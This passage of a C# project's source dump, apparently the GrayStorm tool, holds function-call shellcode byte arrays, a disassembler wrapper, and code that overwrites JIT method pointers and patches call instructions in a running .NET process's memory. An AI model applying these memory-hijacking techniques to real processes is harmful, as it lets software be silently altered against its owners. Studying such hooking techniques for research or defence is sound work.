180 | 0x89, 0xe5, //mov ebp, esp
181 | 0x8b, 0x44, 0x24, 0x28, //mov eax, [esp + 28]
182 | 0xff, 0xd0, //call eax
183 | 0x89, 0xec,//mov esp, ebp
184 | 0x5d, //pop ebp
185 | 0x61, //popad
186 | 0xc3//ret
187 | };
188 |
189 | static public byte[] call_a_fun_ptr_64 = new byte[]
190 | {
191 | 0x55, 0x50, 0x53, 0x52, 0x56, 0x57, 0x55, 0x54, 0x41, 0x50, 0x41, 0x51,
192 | 0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
193 | 0x48, 0x89, 0xe5, 0xff, 0xd1, 0x48, 0x89, 0xec, 0x41, 0x5f, 0x41, 0x5e,
194 | 0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58,
195 | 0x5c, 0x5d, 0x5f, 0x5e, 0x5a, 0x5b, 0x58, 0x5d, 0xc3
196 | };
197 |
198 | static public byte[] call_a_fun_ptr_INT3 = new byte[]
199 | {
200 | 0xcc, 0xcc, //Int3
201 | 0x60, //pushad
202 | 0x55,//push ebp
203 | 0x89, 0xe5, //mov ebp, esp
204 | 0x8b, 0x44, 0x24, 0x28, //mov eax, [esp + 28]
205 | 0xff, 0xd0, //call eax
206 | 0x89, 0xec,//mov esp, ebp
207 | 0x5d, //pop ebp
208 | 0x61, //popad
209 | 0xc3//ret
210 | };
211 |
212 | static public byte[] call_a_fun_ptr_INT3_64 = new byte[]
213 | {
214 | 0xcc,0xcc, 0x55, 0x50, 0x53, 0x52, 0x56, 0x57, 0x55, 0x54, 0x41, 0x50, 0x41, 0x51,
215 | 0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
216 | 0x48, 0x89, 0xe5, 0xff, 0xd1, 0x48, 0x89, 0xec, 0x41, 0x5f, 0x41, 0x5e,
217 | 0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58,
218 | 0x5c, 0x5d, 0x5f, 0x5e, 0x5a, 0x5b, 0x58, 0x5d, 0xc3
219 | };
220 |
221 | #endregion memoryReadingShellcode
222 | }
223 | }
224 |
--------------------------------------------------------------------------------
/assemblyHelpers/signatures.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Text;
6 | using System.Reflection;
7 | using System.Reflection.Emit;
8 | using System.Linq.Expressions;
9 |
10 | namespace GrayStorm
11 | {
12 | public class signatures
13 | {
14 | public static Delegate getSignature(MethodInfo targetMethod, object target = null)
15 | {
16 | ParameterInfo[] myArray = targetMethod.GetParameters();
17 | List args = new List();
18 |
19 | foreach (ParameterInfo MyParam in myArray)
20 | args.Add(MyParam.ParameterType);
21 |
22 | Type delegateType;
23 | if (targetMethod.ReturnType == typeof(void))
24 | {
25 | try
26 | {
27 | delegateType = Expression.GetActionType(args.ToArray());
28 | }
29 | catch
30 | {
31 | return null;
32 | }
33 | }
34 | else
35 | {
36 | args.Add(targetMethod.ReturnType);
37 | try
38 | {
39 | delegateType = Expression.GetFuncType(args.ToArray());
40 | }
41 | catch
42 | {
43 | return null;
44 | }
45 |
46 | }
47 | try
48 | {
49 | if (delegateType != null)
50 | {
51 | Delegate methodDelegate = null;
52 | System.Threading.Thread call = new System.Threading.Thread
53 | (
54 | () =>
55 | {
56 | try { methodDelegate = Delegate.CreateDelegate(delegateType, target, targetMethod); }
57 | catch { }
58 | }
59 | );
60 | call.Start();
61 | System.Threading.Thread.Sleep(100);
62 | call.Abort();
63 | return methodDelegate;
64 | }
65 | else
66 | return null;
67 | }
68 | catch
69 | {
70 | return null;
71 | }
72 | }
73 | }
74 | }
75 |
--------------------------------------------------------------------------------
/beaEngine/Constants.cs:
--------------------------------------------------------------------------------
1 | namespace GrayStorm.beaEngine
2 | {
3 | public class BeaConstants
4 | {
5 | #region constants
6 | public static int INSTRUCT_LENGTH = 64;
7 |
8 | public enum SegmentRegister : byte
9 | {
10 | ESReg = 1,
11 | DSReg = 2,
12 | FSReg = 3,
13 | GSReg = 4,
14 | CSReg = 5,
15 | SSReg = 6
16 | }
17 |
18 | public enum PrefixType : byte
19 | {
20 | NotUsedPrefix = 0,
21 | InUsePrefix = 1,
22 | SuperfluousPrefix = 2,
23 | InvalidPrefix = 4,
24 | MandatoryPrefix = 8
25 | }
26 |
27 | public enum InstructionType : uint
28 | {
29 | GENERAL_PURPOSE_INSTRUCTION = 0x10000,
30 | FPU_INSTRUCTION = 0x20000,
31 | MMX_INSTRUCTION = 0x40000,
32 | SSE_INSTRUCTION = 0x80000,
33 | SSE2_INSTRUCTION = 0x100000,
34 | SSE3_INSTRUCTION = 0x200000,
35 | SSSE3_INSTRUCTION = 0x400000,
36 | SSE41_INSTRUCTION = 0x800000,
37 | SSE42_INSTRUCTION = 0x1000000,
38 | SYSTEM_INSTRUCTION = 0x2000000,
39 | VM_INSTRUCTION = 0x4000000,
40 | UNDOCUMENTED_INSTRUCTION = 0x8000000,
41 | AMD_INSTRUCTION = 0x10000000,
42 | ILLEGAL_INSTRUCTION = 0x20000000,
43 | AES_INSTRUCTION = 0x40000000,
44 | CLMUL_INSTRUCTION = 0x80000000,
45 |
46 | DATA_TRANSFER = 0x1,
47 | ARITHMETIC_INSTRUCTION,
48 | LOGICAL_INSTRUCTION,
49 | SHIFT_ROTATE,
50 | BIT_UInt8,
51 | CONTROL_TRANSFER,
52 | STRING_INSTRUCTION,
53 | InOutINSTRUCTION,
54 | ENTER_LEAVE_INSTRUCTION,
55 | FLAG_CONTROL_INSTRUCTION,
56 | SEGMENT_REGISTER,
57 | MISCELLANEOUS_INSTRUCTION,
58 | COMPARISON_INSTRUCTION,
59 | LOGARITHMIC_INSTRUCTION,
60 | TRIGONOMETRIC_INSTRUCTION,
61 | UNSUPPORTED_INSTRUCTION,
62 | LOAD_CONSTANTS,
63 | FPUCONTROL,
64 | STATE_MANAGEMENT,
65 | CONVERSION_INSTRUCTION,
66 | SHUFFLE_UNPACK,
67 | PACKED_SINGLE_PRECISION,
68 | SIMD128bits,
69 | SIMD64bits,
70 | CACHEABILITY_CONTROL,
71 | FP_INTEGER_CONVERSION,
72 | SPECIALIZED_128bits,
73 | SIMD_FP_PACKED,
74 | SIMD_FP_HORIZONTAL,
75 | AGENT_SYNCHRONISATION,
76 | PACKED_ALIGN_RIGHT,
77 | PACKED_SIGN,
78 | PACKED_BLENDING_INSTRUCTION,
79 | PACKED_TEST,
80 | PACKED_MINMAX,
81 | HORIZONTAL_SEARCH,
82 | PACKED_EQUALITY,
83 | STREAMING_LOAD,
84 | INSERTION_EXTRACTION,
85 | DOT_PRODUCT,
86 | SAD_INSTRUCTION,
87 | ACCELERATOR_INSTRUCTION,
88 | ROUND_INSTRUCTION
89 | }
90 |
91 | public enum EFlagState : byte
92 | {
93 | TE_ = 1,
94 | MO_ = 2,
95 | RE_ = 4,
96 | SE_ = 8,
97 | UN_ = 0x10,
98 | PR_ = 0x20
99 | }
100 |
101 | public enum BranchType : short
102 | {
103 | JO = 1,
104 | JC,
105 | JE,
106 | JA,
107 | JS,
108 | JP,
109 | JL,
110 | JG,
111 | JB,
112 | JECXZ,
113 | JmpType,
114 | CallType,
115 | RetType,
116 | JNO = -1,
117 | JNC = -2,
118 | JNE = -3,
119 | JNA = -4,
120 | JNS = -5,
121 | JNP = -6,
122 | JNL = -7,
123 | JNG = -8,
124 | JNB = -9
125 | }
126 |
127 | public enum ArgumentType : uint
128 | {
129 | NO_ARGUMENT = 0x10000000,
130 | REGISTER_TYPE = 0x20000000,
131 | MEMORY_TYPE = 0x40000000,
132 | CONSTANT_TYPE = 0x80000000,
133 |
134 | MMX_REG = 0x10000,
135 | GENERAL_REG = 0x20000,
136 | FPU_REG = 0x40000,
137 | SSE_REG = 0x80000,
138 | CR_REG = 0x100000,
139 | DR_REG = 0x200000,
140 | SPECIAL_REG = 0x400000,
141 | MEMORY_MANAGEMENT_REG = 0x800000,
142 | SEGMENT_REG = 0x1000000,
143 |
144 | RELATIVE_ = 0x4000000,
145 | ABSOLUTE_ = 0x8000000,
146 |
147 | READ = 0x1,
148 | WRITE = 0x2,
149 |
150 | REG0 = 0x1,
151 | REG1 = 0x2,
152 | REG2 = 0x4,
153 | REG3 = 0x8,
154 | REG4 = 0x10,
155 | REG5 = 0x20,
156 | REG6 = 0x40,
157 | REG7 = 0x80,
158 | REG8 = 0x100,
159 | REG9 = 0x200,
160 | REG10 = 0x400,
161 | REG11 = 0x800,
162 | REG12 = 0x1000,
163 | REG13 = 0x2000,
164 | REG14 = 0x4000,
165 | REG15 = 0x8000
166 | }
167 |
168 | public enum SpecialInfo : int
169 | {
170 | UNKNOWN_OPCODE = -1,
171 | OUT_OF_BLOCK = 0,
172 |
173 | /* === mask = 0xff */
174 | NoTabulation = 0x00000000,
175 | Tabulation = 0x00000001,
176 |
177 | /* === mask = 0xff00 */
178 | MasmSyntax = 0x00000000,
179 | GoAsmSyntax = 0x00000100,
180 | NasmSyntax = 0x00000200,
181 | ATSyntax = 0x00000400,
182 |
183 | /* === mask = 0xff0000 */
184 | PrefixedNumeral = 0x00010000,
185 | SuffixedNumeral = 0x00000000,
186 |
187 | /* === mask = 0xff000000 */
188 | ShowSegmentRegs = 0x01000000,
189 |
190 | LowPosition = 0,
191 | HighPosition = 1
192 | }
193 | #endregion constants
194 | }
195 | }
196 |
--------------------------------------------------------------------------------
/beaEngine/Disassemble.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Runtime.InteropServices;
6 |
7 | namespace GrayStorm.beaEngine
8 | {
9 | class disassemble
10 | {
11 | #region disassemble
12 | /// The instruction pointer to start disassembly on
13 | /// The PID to the process to get memory from
14 | /// The listbox to dump disasm to
15 | /// The trueIntPtr of the Method that we want to attack so that our jmp,call,etc are at the correct offsets.
16 | public void disassembler(byte[] bytesToDisassam, System.Windows.Forms.RichTextBox disasmBox, IntPtr methodIntPtr)
17 | {
18 | try
19 | {
20 | var disasm = new Disasm();
21 | IntPtr disasmPtr = Marshal.AllocHGlobal(Marshal.SizeOf(disasm));
22 |
23 | int result = 0;
24 |
25 | if (IntPtr.Size == 8)
26 | {
27 | disasm.Archi = 64;
28 | }
29 | else
30 | disasm.Archi = 32;
31 |
32 | disasm.Options = 0x200; //display in NASM syntax
33 |
34 | int size = bytesToDisassam.Length;
35 | //IntPtr executionPointer = System.Runtime.InteropServices.Marshal.AllocHGlobal(size);
36 | // System.Runtime.InteropServices.Marshal.Copy(bytesToDisassam, 0, executionPointer, size);
37 | disasm.EIP = methodIntPtr;
38 |
39 | var EIPrange = (methodIntPtr.ToInt64() + size / 2);
40 |
41 | while (true)
42 | {
43 | System.Runtime.InteropServices.Marshal.StructureToPtr(disasm, disasmPtr, false);
44 | if (IntPtr.Size == 8)
45 | {
46 |
47 | result = BeaEngine.Disasm64(disasmPtr);
48 | Marshal.PtrToStructure(disasmPtr, disasm);
49 | }
50 | else
51 | result = BeaEngine.Disasm(disasm);
52 |
53 |
54 | //Marshal.PtrToStructure(disasmPtr, disasm);
55 | if (result == (int)BeaConstants.SpecialInfo.UNKNOWN_OPCODE)
56 | {
57 | disasmBox.AppendText("Beaengine error: unknown opcode \n");
58 | break;
59 | }
60 |
61 | disasmBox.AppendText("0x" + disasm.Instruction.Opcode.ToString("X") + " " + disasm.CompleteInstr.ToString() + "\n");
62 |
63 | if (disasm.Instruction.Opcode.ToString("X") == "C3")
64 | break;
65 |
66 | disasm.EIP = new IntPtr(disasm.EIP.ToInt64() + result);
67 |
68 | }
69 | }
70 | catch (Exception ex)
71 | {
72 | disasmBox.AppendText("Beaengine error: " + ex.Message.ToString() + "\n");
73 | }
74 | }
75 | #endregion disassemble
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/beaEngine/Engine.cs:
--------------------------------------------------------------------------------
1 | using System.Runtime.InteropServices;
2 | using System;
3 |
4 | namespace GrayStorm.beaEngine
5 | {
6 | public class BeaEngine
7 | {
8 | #region P/Invoke
9 | [DllImport("BeaEngine.dll")]
10 | public static extern int Disasm([In, Out, MarshalAs(UnmanagedType.LPStruct)] Disasm disasm);
11 |
12 | [DllImport("BeaEngine64.dll", EntryPoint = "Disasm")]
13 | public static extern int Disasm64([In, Out] IntPtr diasm);
14 | #endregion P/Invoke
15 | }
16 | }
--------------------------------------------------------------------------------
/beaEngine/Structs.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | namespace GrayStorm.beaEngine
5 | {
6 | #region structs
7 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
8 | public class REX_Struct
9 | {
10 | public byte W_;
11 | public byte R_;
12 | public byte X_;
13 | public byte B_;
14 | public byte state;
15 | }
16 |
17 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
18 | public class PrefixInfo
19 | {
20 | public int Number;
21 | public int NbUndefined;
22 | public byte LockPrefix;
23 | public byte OperandSize;
24 | public byte AddressSize;
25 | public byte RepnePrefix;
26 | public byte RepPrefix;
27 | public byte FSPrefix;
28 | public byte SSPrefix;
29 | public byte GSPrefix;
30 | public byte ESPrefix;
31 | public byte CSPrefix;
32 | public byte DSPrefix;
33 | public byte BranchTaken;
34 | public byte BranchNotTaken;
35 | public REX_Struct REX;
36 | }
37 |
38 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
39 | public class EFLStruct
40 | {
41 | public byte OF_;
42 | public byte SF_;
43 | public byte ZF_;
44 | public byte AF_;
45 | public byte PF_;
46 | public byte CF_;
47 | public byte TF_;
48 | public byte IF_;
49 | public byte DF_;
50 | public byte NT_;
51 | public byte RF_;
52 | public byte alignment;
53 | }
54 |
55 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
56 | public class MemoryType
57 | {
58 | public Int32 BaseRegister;
59 | public Int32 IndexRegister;
60 | public Int32 Scale;
61 | public Int64 Displacement;
62 | }
63 |
64 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
65 | public class InstructionType
66 | {
67 | public Int32 Category;
68 | public Int32 Opcode;
69 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 16)]
70 | public string Mnemonic;
71 | public Int32 BranchType;
72 | public EFLStruct Flags;
73 | public UInt64 AddrValue;
74 | public Int64 Immediat;
75 | public UInt32 ImplicitModifiedRegs;
76 | }
77 |
78 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
79 | public class ArgumentType
80 | {
81 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 32)]
82 | public string ArgMnemonic;
83 | public Int32 ArgType;
84 | public Int32 ArgSize;
85 | public Int32 ArgPosition;
86 | public UInt32 AccessMode;
87 | public MemoryType Memory;
88 | public UInt32 SegmentReg;
89 | }
90 |
91 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
92 | public class Disasm
93 | {
94 | public IntPtr EIP;
95 | public UInt64 VirtualAddr;
96 | public UInt32 SecurityBlock;
97 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 64)]
98 | public string CompleteInstr;
99 | public UInt32 Archi;
100 | public UInt64 Options;
101 | public InstructionType Instruction;
102 | public ArgumentType Argument1;
103 | public ArgumentType Argument2;
104 | public ArgumentType Argument3;
105 | public PrefixInfo Prefix;
106 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 40, ArraySubType = UnmanagedType.U4)]
107 | UInt32[] Reserved_;
108 | }
109 | #endregion structs
110 | }
111 |
--------------------------------------------------------------------------------
/dynamicC/dynamicMethodGenerators.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Reflection.Emit;
6 | using System.Text;
7 |
8 |
9 | namespace GrayStorm.dynamicC
10 | {
11 | class dynamicMethodGenerators
12 | {
13 | public static DynamicMethod CreateTestMethod(MethodInfo targetIN)
14 | {
15 | string name = targetIN.Name;
16 | ParameterInfo[] myArray = targetIN.GetParameters();
17 | List args = new List();
18 |
19 | foreach (ParameterInfo MyParam in myArray)
20 | args.Add(MyParam.ParameterType);
21 | if (targetIN.ReturnType != typeof(void))
22 | {
23 | args.Add(targetIN.ReturnType);
24 | }
25 |
26 | DynamicMethod dynamicMethod =
27 | new DynamicMethod(
28 | name,
29 | MethodAttributes.Static | MethodAttributes.Public,
30 | CallingConventions.Standard,
31 | targetIN.ReturnType,
32 | args.ToArray(),
33 | targetIN.Module,
34 | false
35 | );
36 |
37 | //test method
38 | Type[] showParameters = { typeof(String) };
39 | MethodInfo simpleShow = typeof(System.Windows.Forms.MessageBox).GetMethod("Show", showParameters);
40 |
41 | // emit
42 | ILGenerator ilgen = dynamicMethod.GetILGenerator();
43 | ilgen.Emit(OpCodes.Ldstr, "Testing Dynamic Methods");
44 | ilgen.Emit(OpCodes.Call, simpleShow);
45 | ilgen.Emit(OpCodes.Pop);
46 | ilgen.Emit(OpCodes.Ret);
47 | // Need to call create delegate
48 | Action action = dynamicMethod.CreateDelegate(typeof(Action)) as Action;
49 | //dynamicMethod.Invoke(null, new object[] { });
50 | return dynamicMethod;
51 | }
52 | }
53 | }
54 |
--------------------------------------------------------------------------------
/dynamicC/methodReplacer.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | using System.Reflection;
7 | using System.Runtime.CompilerServices;
8 | using System.Reflection.Emit;
9 |
10 | namespace GrayStorm.dynamic_C
11 | {
12 | class methodReplacer
13 | {
14 | public static void replaceIL(MethodInfo originalMethod, MethodInfo newMethod)
15 | {
16 | //make new user inputted method
17 | //MethodInfo newMethod = liveMethod.userInputMethod();
18 | if (newMethod == null || originalMethod == null)
19 | return;
20 |
21 | // Jit the method if not already
22 | RuntimeHelpers.PrepareMethod(newMethod.MethodHandle);
23 |
24 | //replace non-dynaically
25 | ReplaceMethod(newMethod, originalMethod, false);
26 | }
27 |
28 | public static void DynamicreplaceIL(MethodInfo replacementMethod, int containedIndex)
29 | {
30 | // Jit the method if not already
31 | RuntimeHelpers.PrepareMethod(replacementMethod.MethodHandle);
32 |
33 | //create a dynamic method
34 | DynamicMethod dynamicMethod = dynamicC.dynamicMethodGenerators.CreateTestMethod(replacementMethod);
35 |
36 | ReplaceMethod(replacementMethod, replacementMethod, true);
37 | }
38 |
39 | ///
40 | /// http://blog.naver.com/techshare/100115994763
41 | ///
42 | /// the destination dynamicMethod/IntPtr
43 | /// the source method/IntPtr
44 | /// Whether or not the dynamicMethod is dynamic
45 | public static void ReplaceMethod(MethodInfo replacementMethod, MethodInfo originalMethod, bool dynamicPtr)
46 | {
47 | IntPtr dynamicIntPtr = IntPtr.Zero;
48 | IntPtr originalMethodIntPtr = IntPtr.Zero;
49 |
50 | unsafe
51 | {
52 | originalMethodIntPtr = (IntPtr)(((int*)originalMethod.MethodHandle.Value.ToPointer() + 2));
53 |
54 | if (!dynamicPtr)
55 | dynamicIntPtr = (IntPtr)(((int*)replacementMethod.MethodHandle.Value.ToPointer() + 2));
56 | else
57 | dynamicIntPtr = getDynamicIntPtr(replacementMethod);
58 |
59 | ulong* overwriteIntPtr = (ulong*)originalMethodIntPtr.ToPointer();
60 | if (dynamicPtr)
61 | {
62 | if (IntPtr.Size == 8)
63 | {
64 | *overwriteIntPtr = (ulong)dynamicIntPtr.ToInt64();
65 | }
66 | else
67 | {
68 | *overwriteIntPtr = (uint)dynamicIntPtr.ToInt32();
69 | }
70 | }
71 | else
72 | *overwriteIntPtr = *((uint*)dynamicIntPtr.ToPointer());
73 | }
74 | }
75 |
76 | public static IntPtr getDynamicIntPtr(MethodBase dunamicInfo)
77 | {
78 | RuntimeMethodHandle handle;
79 | MethodInfo getMethodDescriptorInfo = typeof(DynamicMethod).GetMethod("GetMethodDescriptor", BindingFlags.NonPublic | BindingFlags.Instance);
80 | handle = (RuntimeMethodHandle)getMethodDescriptorInfo.Invoke(dunamicInfo, null);
81 | RuntimeHelpers.PrepareMethod(handle);
82 | return handle.GetFunctionPointer();
83 | }
84 | }
85 | }
86 |
--------------------------------------------------------------------------------
/dynamicC/userCreatedMethods.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Reflection;
5 | using System.Text;
6 |
7 |
8 | namespace GrayStorm.dynamicC
9 | {
10 | class userCreatedMethods
11 | {
12 | public static List userCreatedMethodsList = new List();
13 | }
14 | }
15 |
--------------------------------------------------------------------------------
/memoryHijacking/StorageInformation.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Reflection;
6 |
7 | namespace GrayStorm
8 | {
9 | public class StorageInformation
10 | {
11 | public MethodInfo methodSignature { get; set; }
12 | public bool dumped { get; set; }
13 | public byte[] memory { get; set; }
14 | public byte[] oldMethod { get; set; }
15 | public IntPtr methodIntPtr { get; set; }
16 | public IntPtr originalIntPtr { get; set; }
17 | public Delegate methodDelegate { get; set; }
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/memoryHijacking/assemblyControlFlow.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | public class assemblyControlFlow
9 | {
10 | #region 1337 code
11 | ///
12 | ///At the time of a call the dword register is called as such
13 | ///0xFF call dword [00189AC4h] which is 6 bytes of 0xFF,0x15,0xC4,0x9A,0x18,0x0
14 | ///I can then select the immediate value and use that as a selector to find the index into memory to set up a new relative call.
15 | ///Once the index in memory is located, I can use manipulation of the long type to calculate a new offset.
16 | ///I then place that offset into the location of the 0xFF by replacing the sequence with a "call immediate/0xE8" instruction.
17 | ///
18 | public static void replaceDwordCall(IntPtr methodPointer)
19 | {
20 | string intPtrString;
21 | Int32 replaceAddress = 0;
22 | IntPtr methodAssembly;
23 | int containedIndex = -1;
24 | byte[] replacementIndex = null;
25 | int indexReplace;
26 | int count = 0;
27 | long dstAddress;
28 | long srcAddress;
29 | long newCallPtr;
30 |
31 | if (domainTraverser.currentMethod == null || methodPointer == IntPtr.Zero)
32 | return;
33 |
34 | containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
35 | if (containedIndex == -1)
36 | {
37 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
38 | containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
39 | }
40 | methodAssembly = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr;
41 |
42 | intPtrString = grayStorm._memoryHijacker.editor_RTB.SelectedText;
43 | grayStorm._memoryHijacker.editor_RTB.SelectionColor = System.Drawing.Color.White;
44 | grayStorm._memoryHijacker.editor_RTB.SelectionBackColor = System.Drawing.Color.Blue;
45 | intPtrString = intPtrString.Replace("\n", string.Empty);
46 | intPtrString = intPtrString.Replace("0x", string.Empty);
47 | intPtrString = intPtrString.Replace("h", string.Empty);
48 | replaceAddress = Convert.ToInt32(intPtrString, 16);
49 |
50 | if (grayStorm._memoryHijacker.disassemble_CB.Checked)
51 | {
52 | replacementIndex = BitConverter.GetBytes(replaceAddress);
53 | }
54 | else
55 | {
56 | replacementIndex = BitConverter.GetBytes(replaceAddress);
57 | Array.Reverse(replacementIndex);
58 | }
59 |
60 | Array.Resize(ref replacementIndex, 6);
61 |
62 | //call dword [0x########] conversion to little endian to make room for 0xff and 0x15
63 | for (count = 3; count >= 0; count--)
64 | {
65 | replacementIndex[count + 2] = replacementIndex[count];
66 | }
67 | replacementIndex[0] = 0xff;
68 | replacementIndex[1] = 0x15;
69 |
70 | indexReplace = PatternAt(methodHelpers.StorageInformationArrayList[containedIndex].oldMethod, replacementIndex);
71 |
72 | if (indexReplace < 0)
73 | {
74 | System.Windows.Forms.MessageBox.Show("Could not find the replacement index");
75 | return;
76 | }
77 |
78 | dstAddress = (long)((int)methodPointer.ToInt32());//new address to call
79 | srcAddress = (long)methodAssembly + indexReplace + 5; //memory location of caller + position of 0xFF + size of call sequence
80 | newCallPtr = dstAddress - srcAddress;
81 |
82 | //Call immediate and NOP to overwrite 6 bytes.
83 | replacementIndex[0] = 0xe8;
84 | replacementIndex[1] = (byte)(newCallPtr);
85 | replacementIndex[2] = (byte)(newCallPtr >> 8);
86 | replacementIndex[3] = (byte)(newCallPtr >> 16);
87 | replacementIndex[4] = (byte)(newCallPtr >> 24);
88 | replacementIndex[5] = 0x90;
89 |
90 | //Write the new custom C# IntPtr over the existing index of the call.
91 | for (count = 0; count <= 5; count++)
92 | {
93 | System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(methodAssembly.ToInt64() + indexReplace + count), replacementIndex[count]);
94 | }
95 | }
96 |
97 | ///
98 | /// Replace a 0xE8 call
99 | /// dstAddress - methodFunPtr + callOffset + byteOffset = new destination address
100 | ///
101 | ///
102 | public static void replaceE8Call(IntPtr methodPointer)
103 | {
104 | string intPtrString;
105 | Int32 replaceAddress = 0;
106 | IntPtr methodAssembly;
107 | int containedIndex = -1;
108 | byte[] replacementIndex = null;
109 | int indexReplace;
110 | int count = 0;
111 | long dstAddress;
112 | long srcAddress;
113 | long newCallPtr;
114 |
115 | if (domainTraverser.currentMethod == null || methodPointer == IntPtr.Zero)
116 | return;
117 |
118 | containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
119 | if (containedIndex == -1)
120 | {
121 | grayStorm._memoryHijacker.dumpAsm_BT_Click(null, null);
122 | containedIndex = methodHelpers.containedInList(domainTraverser.currentMethod);
123 | }
124 | methodAssembly = methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr;
125 |
126 | intPtrString = grayStorm._memoryHijacker.editor_RTB.SelectedText;
127 | grayStorm._memoryHijacker.editor_RTB.SelectionColor = System.Drawing.Color.White;
128 | grayStorm._memoryHijacker.editor_RTB.SelectionBackColor = System.Drawing.Color.Blue;
129 | intPtrString = intPtrString.Replace("\n", string.Empty);
130 | intPtrString = intPtrString.Replace("0x", string.Empty);
131 | intPtrString = intPtrString.Replace("h", string.Empty);
132 | replaceAddress = Convert.ToInt32(intPtrString, 16);
133 |
134 | //call immediate conversion to little endian to make room
135 | if (grayStorm._memoryHijacker.disassemble_CB.Checked)
136 | {
137 | System.Windows.Forms.MessageBox.Show("Not yet supported, perform action in hex dump");
138 | return;
139 | //Need to get the real address that would be in the disassembly. :(
140 | //How? TODO
141 | // newCallPtr = (long)replaceAddress + (long)methodAssembly + 5 + 0; //restore the assembly dump by taking dst + methodAddr + 5 + offset??????
142 | // replaceAddress = Convert.ToInt32(newCallPtr);
143 | // replacementIndex = BitConverter.GetBytes(replaceAddress);
144 | }
145 | else
146 | {
147 | replacementIndex = BitConverter.GetBytes(replaceAddress);
148 | Array.Reverse(replacementIndex);
149 | }
150 |
151 | indexReplace = PatternAt(methodHelpers.StorageInformationArrayList[containedIndex].oldMethod, replacementIndex);
152 | indexReplace -= 1; //because not matching on the 0xE8B
153 | if (indexReplace < 0)
154 | {
155 | System.Windows.Forms.MessageBox.Show("Could not find the replacement index");
156 | return;
157 | }
158 |
159 | dstAddress = (long)((int)methodPointer.ToInt32());//new address to call
160 | srcAddress = (long)methodAssembly + indexReplace + 5; //memory location of caller + position of 0xFF + size of call sequence
161 | newCallPtr = dstAddress - srcAddress;
162 |
163 | Array.Resize(ref replacementIndex, 5);
164 | //Call immediate and NOP to overwrite 5 bytes.
165 | replacementIndex[0] = 0xe8;
166 | replacementIndex[1] = (byte)(newCallPtr);
167 | replacementIndex[2] = (byte)(newCallPtr >> 8);
168 | replacementIndex[3] = (byte)(newCallPtr >> 16);
169 | replacementIndex[4] = (byte)(newCallPtr >> 24);
170 |
171 | //Write the new custom C# IntPtr over the existing index of the call.
172 | for (count = 0; count <= 4; count++)
173 | {
174 | System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(methodAssembly.ToInt64() + indexReplace + count), replacementIndex[count]);
175 | }
176 | }
177 |
178 | public static int PatternAt(byte[] source, byte[] pattern)
179 | {
180 | for (int i = 0; i < source.Length; i++)
181 | {
182 | if (source.Skip(i).Take(pattern.Length).SequenceEqual(pattern))
183 | {
184 | return i;
185 | }
186 | }
187 | return -1;
188 | }
189 | #endregion 1337 code
190 | }
191 | }
192 |
--------------------------------------------------------------------------------
/memoryHijacking/domainTraverser.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | public static class domainTraverser
9 | {
10 | public static System.Reflection.MethodInfo currentMethod
11 | {
12 | get;
13 | set;
14 | }
15 |
16 | public static System.Reflection.ConstructorInfo currentConstructor
17 | {
18 | get;
19 | set;
20 | }
21 |
22 | public static System.Reflection.Assembly assemblyInfo
23 | {
24 | get;
25 | set;
26 | }
27 |
28 | public static System.Type typeInfo
29 | {
30 | get;
31 | set;
32 | }
33 |
34 | public static object curObject
35 | {
36 | get;
37 | set;
38 | }
39 |
40 | public static StorageInformation curStorage
41 | {
42 | set;
43 | get;
44 | }
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/memoryHijacking/methodHelpers.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Runtime.InteropServices;
4 | using System.Reflection;
5 | using System.Diagnostics;
6 | using System.Text.RegularExpressions;
7 | using System.Runtime.CompilerServices;
8 | using System.Reflection.Emit;
9 | using System.Windows.Forms;
10 | using System.Text;
11 | using System.Collections.Generic;
12 |
13 | namespace GrayStorm
14 | {
15 | #region storageInformationHelpers
16 | ///
